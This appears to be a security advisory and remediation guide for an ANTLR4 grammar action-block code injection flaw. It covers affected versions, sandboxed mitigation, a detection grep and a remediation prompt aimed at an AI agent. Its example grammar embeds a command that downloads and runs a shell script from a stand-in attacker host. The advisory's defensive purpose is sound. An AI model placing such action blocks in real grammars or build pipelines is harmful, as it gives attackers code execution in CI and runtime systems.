CVE-2026-13500 - ANTLR4 grammar action block code injection

CVE-2026-13500 - ANTLR4 grammar action block code injection - High - 2026-06-28

Business risk: A malicious grammar submitted through a plugin, PR, or tenant extension can inject code into generated parser output and reach CI or runtime execution.

Root cause: Grammar action blocks and output-file generation are handled as trusted source during ANTLR code generation.

Affected versions

  • Vulnerable: ANTLR4 up to 4.13.2 when untrusted grammars/action blocks are processed by code-generation pipelines.
  • Fixed / safe target: No vendor-fixed release was listed in NVD at intake; treat grammar files as executable build inputs and sandbox ANTLR generation.
  • CVSS: 7.3 (High)

Exact vulnerable code pattern

grammar UserSupplied;
rule
  : ID { Runtime.getRuntime().exec("curl https://attacker/payload.sh | sh"); }
  ;

Fixed / mitigated code pattern

antlr_generate:
  image: hardened/antlr-sandbox:readonly
  script:
    - ./scripts/validate-grammar-allowlist.sh grammars/
    - java -jar /opt/antlr/antlr-4.13.2-complete.jar -Dlanguage=Java grammars/Trusted.g4

Step-by-step integration guide

  1. Inventory ANTLR4 versions and generation workflows.
  2. Block generation for untrusted PRs, tenant uploads, plugin grammars, or marketplace extensions.
  3. Run generation in a sandbox with no network or secrets.
  4. Reject action blocks in externally supplied grammars.
  5. Track vendor updates and upgrade as soon as a fixed release is available.

Alternative mitigations

  • Disable grammar uploads or custom grammar plugins.
  • Use allow-listed checked-in grammars only.
  • Run generation on isolated ephemeral workers without credentials.

Detection signature

rg -n "antlr|ANTLR4|\.g4|OutputFile\.java|org\.antlr|antlr4-maven-plugin|antlr4ts" .

Copy-paste skill block

Model context: this prompt was generated by GPT 5.5 Extra High reasoning.

Remediate CVE-2026-13500: ANTLR4 grammar action block code injection.

Required output:
- A reviewer-ready PR with dependency/config/code changes, tests, and deployment notes; or
- TRIAGE.md if the affected runtime is outside this repository.

Steps:
1. Confirm exposure using the detection signature above.
2. Apply the fixed or mitigated pattern.
3. Add or run a regression test for the exploit shape.
4. Record commands, versions, and residual risk in the PR body.

Boundaries:
- Scope only CVE-2026-13500 and directly related hardening.
- Do not run destructive exploit payloads against production.
- Preserve existing behavior except for the vulnerable path.

Tags and revenue routing

  • Keywords: cve, antlr4, java, code-generation, ci, code-injection, sellable_to_platform, zero_day_gold, high
  • Affected tech stack: java/maven
  • Revenue tags: sellable_to_platform, zero_day_gold

References